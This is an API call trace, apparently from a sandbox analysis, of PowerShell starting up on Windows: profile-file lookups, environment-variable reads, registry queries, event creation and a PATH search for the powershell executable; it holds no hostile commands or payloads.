	[0347.124] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x26d2f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0347.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", nBufferLength=0x105, lpBuffer=0x26d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1", lpFilePart=0x0) returned 0x36
	[0347.124] SetErrorMode (uMode=0x1) returned 0x1
	[0347.124] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d6a0 | out: lpFileInformation=0x26d6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0347.124] SetErrorMode (uMode=0x1) returned 0x1
	[0347.125] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x26d490, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x4b
	[0347.125] SetErrorMode (uMode=0x1) returned 0x1
	[0347.125] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d6a0 | out: lpFileInformation=0x26d6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0347.125] SetErrorMode (uMode=0x1) returned 0x1
	[0347.125] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", nBufferLength=0x105, lpBuffer=0x26d490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1", lpFilePart=0x0) returned 0x45
	[0347.125] SetErrorMode (uMode=0x1) returned 0x1
	[0347.125] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d6a0 | out: lpFileInformation=0x26d6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0347.125] SetErrorMode (uMode=0x1) returned 0x1
	[0347.125] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", nBufferLength=0x105, lpBuffer=0x26d490, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1", lpFilePart=0x0) returned 0x5a
	[0347.125] SetErrorMode (uMode=0x1) returned 0x1
	[0347.125] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Microsoft.PowerShell_profile.ps1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\windowspowershell\\microsoft.powershell_profile.ps1"), fInfoLevelId=0x0, lpFileInformation=0x26d6a0 | out: lpFileInformation=0x26d6a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0347.125] SetErrorMode (uMode=0x1) returned 0x1
	[0347.126] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.126] CoTaskMemFree (pv=0x100430) 
	[0347.126] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.126] CoTaskMemFree (pv=0x100430) 
	[0347.126] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.126] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.126] CoTaskMemFree (pv=0x100430) 
	[0347.127] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.127] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.127] CoTaskMemFree (pv=0x100430) 
	[0347.130] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.130] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.130] CoTaskMemFree (pv=0x100430) 
	[0347.130] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x340
	[0347.130] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x358
	[0347.131] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x350
	[0347.131] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x354
	[0347.131] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x370
	[0347.131] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x374
	[0347.131] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x34c
	[0347.131] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x308
	[0347.131] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0x328
	[0347.131] CreateEventW (lpEventAttributes=0x0, bManualReset=0, bInitialState=1, lpName=0x0) returned 0x300
	[0347.131] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x32c
	[0347.131] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x330
	[0347.132] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.132] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.132] CoTaskMemFree (pv=0x100430) 
	[0347.133] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
	[0347.134] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x26d880 | out: lpMode=0x26d880) returned 1
	[0347.134] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.134] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.134] CoTaskMemFree (pv=0x100430) 
	[0347.137] SetEvent (hEvent=0x354) returned 1
	[0347.137] SetEvent (hEvent=0x340) returned 1
	[0347.137] SetEvent (hEvent=0x358) returned 1
	[0347.137] SetEvent (hEvent=0x350) returned 1
	[0347.137] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x334
	[0347.139] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.139] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.139] CoTaskMemFree (pv=0x100430) 
	[0347.139] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds", ulOptions=0x0, samDesired=0x20019, phkResult=0x26d5d8 | out: phkResult=0x26d5d8*=0x338) returned 0x0
	[0347.139] RegQueryValueExW (in: hKey=0x338, lpValueName="PipelineMaxStackSizeMB", lpReserved=0x0, lpType=0x26d55c, lpData=0x0, lpcbData=0x26d558*=0x0 | out: lpType=0x26d55c*=0x0, lpData=0x0, lpcbData=0x26d558*=0x0) returned 0x2

Thread:
	id = 143
	os_tid = 0xac8


Thread:
	id = 149
	os_tid = 0xb20


Thread:
	id = 176
	os_tid = 0xa48


Thread:
	id = 200
	os_tid = 0x7ec


Thread:
	id = 201
	os_tid = 0x2ec

	[0288.385] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0330.131] RegCloseKey (hKey=0x300) returned 0x0
	[0330.131] LocalFree (hMem=0xd7290) returned 0x0
	[0330.131] RegCloseKey (hKey=0x328) returned 0x0
	[0330.132] LocalFree (hMem=0xd72c0) returned 0x0
	[0330.132] CloseHandle (hObject=0x318) returned 1
	[0330.132] CloseHandle (hObject=0x13) returned 1
	[0330.133] CloseHandle (hObject=0xf) returned 1
	[0330.133] RegCloseKey (hKey=0x308) returned 0x0
	[0330.134] RegCloseKey (hKey=0x304) returned 0x0
	[0335.819] RegCloseKey (hKey=0x304) returned 0x0
	[0340.748] RegCloseKey (hKey=0x338) returned 0x0
	[0340.748] RegCloseKey (hKey=0x334) returned 0x0
	[0340.748] RegCloseKey (hKey=0x330) returned 0x0
	[0340.749] RegCloseKey (hKey=0x32c) returned 0x0
	[0340.749] RegCloseKey (hKey=0x300) returned 0x0
	[0340.749] RegCloseKey (hKey=0x328) returned 0x0
	[0340.749] RegCloseKey (hKey=0x308) returned 0x0
	[0340.750] RegCloseKey (hKey=0x304) returned 0x0
	[0340.750] RegCloseKey (hKey=0x354) returned 0x0
	[0340.750] RegCloseKey (hKey=0x350) returned 0x0
	[0340.750] RegCloseKey (hKey=0x358) returned 0x0
	[0340.750] RegCloseKey (hKey=0x340) returned 0x0
	[0340.751] RegCloseKey (hKey=0x33c) returned 0x0
	[0345.175] RegCloseKey (hKey=0x36c) returned 0x0
	[0345.175] RegCloseKey (hKey=0x368) returned 0x0
	[0345.176] RegCloseKey (hKey=0x364) returned 0x0
	[0345.176] RegCloseKey (hKey=0x360) returned 0x0
	[0345.176] RegCloseKey (hKey=0x304) returned 0x0
	[0345.176] RegCloseKey (hKey=0x378) returned 0x0
	[0345.177] RegCloseKey (hKey=0x338) returned 0x0
	[0345.177] RegCloseKey (hKey=0x334) returned 0x0
	[0345.177] RegCloseKey (hKey=0x330) returned 0x0
	[0345.177] RegCloseKey (hKey=0x32c) returned 0x0
	[0345.178] RegCloseKey (hKey=0x300) returned 0x0
	[0345.178] RegCloseKey (hKey=0x328) returned 0x0
	[0345.178] RegCloseKey (hKey=0x308) returned 0x0
	[0345.178] RegCloseKey (hKey=0x34c) returned 0x0
	[0345.179] RegCloseKey (hKey=0x374) returned 0x0
	[0345.179] RegCloseKey (hKey=0x370) returned 0x0
	[0345.179] RegCloseKey (hKey=0x354) returned 0x0
	[0345.179] RegCloseKey (hKey=0x350) returned 0x0
	[0345.179] RegCloseKey (hKey=0x358) returned 0x0
	[0345.180] RegCloseKey (hKey=0x340) returned 0x0
	[0345.180] RegCloseKey (hKey=0x33c) returned 0x0
	[0641.665] RegCloseKey (hKey=0x338) returned 0x0

Thread:
	id = 266
	os_tid = 0xd9c


Thread:
	id = 361
	os_tid = 0xe28

	[0347.447] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0347.451] SetThreadUILanguage (LangId=0x0) returned 0x7fffffa0409
	[0347.456] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.456] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.456] CoTaskMemFree (pv=0x100430) 
	[0347.458] VirtualQuery (in: lpAddress=0x1c92de00, lpBuffer=0x1c92ecc0, dwLength=0x30 | out: lpBuffer=0x1c92ecc0*(BaseAddress=0x1c92d000, AllocationBase=0x1bfa0000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.461] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.461] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.461] CoTaskMemFree (pv=0x100430) 
	[0347.464] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.464] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.464] CoTaskMemFree (pv=0x100430) 
	[0347.467] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.467] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.467] CoTaskMemFree (pv=0x100430) 
	[0347.484] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.484] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.484] CoTaskMemFree (pv=0x100430) 
	[0347.486] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.487] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.487] CoTaskMemFree (pv=0x100430) 
	[0347.488] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.488] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.488] CoTaskMemFree (pv=0x100430) 
	[0347.493] VirtualQuery (in: lpAddress=0x1c92e0b0, lpBuffer=0x1c92ef70, dwLength=0x30 | out: lpBuffer=0x1c92ef70*(BaseAddress=0x1c92e000, AllocationBase=0x1bfa0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x2000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0347.493] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.493] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.494] CoTaskMemFree (pv=0x100430) 
	[0347.824] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.824] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.824] CoTaskMemFree (pv=0x100430) 
	[0347.824] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.824] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.824] CoTaskMemFree (pv=0x100430) 
	[0347.826] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.826] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.826] CoTaskMemFree (pv=0x100430) 
	[0347.830] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0347.830] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0347.830] CoTaskMemFree (pv=0x100430) 
	[0348.208] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0348.208] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0348.208] CoTaskMemFree (pv=0x100430) 
	[0348.210] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0348.210] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0348.210] CoTaskMemFree (pv=0x100430) 
	[0348.211] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0348.211] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0348.211] CoTaskMemFree (pv=0x100430) 
	[0348.214] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0348.214] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0348.214] CoTaskMemFree (pv=0x100430) 
	[0348.215] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0348.215] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0348.216] CoTaskMemFree (pv=0x100430) 
	[0348.217] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0348.217] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0348.217] CoTaskMemFree (pv=0x100430) 
	[0348.219] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0348.219] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0348.219] CoTaskMemFree (pv=0x100430) 
	[0348.518] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0348.518] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0348.518] CoTaskMemFree (pv=0x100430) 
	[0348.896] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0348.896] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35
	[0348.897] CoTaskMemFree (pv=0x100430) 
	[0348.899] CoTaskMemAlloc (cb=0x104) returned 0x100430
	[0348.899] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x100430, nSize=0x80 | out: lpBuffer="") returned 0x92
	[0348.900] CoTaskMemFree (pv=0x100430) 
	[0348.900] CoTaskMemAlloc (cb=0x128) returned 0x135e30
	[0348.900] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x135e30, nSize=0x92 | out: lpBuffer="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x91
	[0348.900] CoTaskMemFree (pv=0x135e30) 
	[0348.904] CoTaskMemAlloc (cb=0x20e) returned 0x1b8f15e0
	[0348.904] GetCurrentDirectoryW (in: nBufferLength=0x105, lpBuffer=0x1b8f15e0 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0348.904] CoTaskMemFree (pv=0x1b8f15e0) 
	[0348.908] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0348.909] SetErrorMode (uMode=0x1) returned 0x1
	[0348.912] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.ps1", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0349.234] SetErrorMode (uMode=0x1) returned 0x1
	[0349.235] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0349.236] SetErrorMode (uMode=0x1) returned 0x1
	[0349.236] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psm1", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0349.244] SetErrorMode (uMode=0x1) returned 0x1
	[0349.245] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0349.245] SetErrorMode (uMode=0x1) returned 0x1
	[0349.245] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.psd1", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0349.254] SetErrorMode (uMode=0x1) returned 0x1
	[0349.255] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0349.255] SetErrorMode (uMode=0x1) returned 0x1
	[0349.255] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.COM", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0349.264] SetErrorMode (uMode=0x1) returned 0x1
	[0349.265] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0349.265] SetErrorMode (uMode=0x1) returned 0x1
	[0349.265] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.EXE", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0349.523] SetErrorMode (uMode=0x1) returned 0x1
	[0349.525] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0349.525] SetErrorMode (uMode=0x1) returned 0x1
	[0349.525] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.BAT", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0349.533] SetErrorMode (uMode=0x1) returned 0x1
	[0349.534] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0349.534] SetErrorMode (uMode=0x1) returned 0x1
	[0349.534] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.CMD", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0349.542] SetErrorMode (uMode=0x1) returned 0x1
	[0349.544] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
	[0349.544] SetErrorMode (uMode=0x1) returned 0x1
	[0349.544] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\powershell.VBS", lpFindFileData=0x1c92dfe0 | out: lpFindFileData=0x1c92dfe0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffffffffffff
	[0349.552] SetErrorMode (uMode=0x1) returned 0x1
	[0349.834] GetFullPathNameW (in: lpFileName="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", nBufferLength=0x105, lpBuffer=0x1c92de40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\", lpFilePart=0x0) returned 0x41
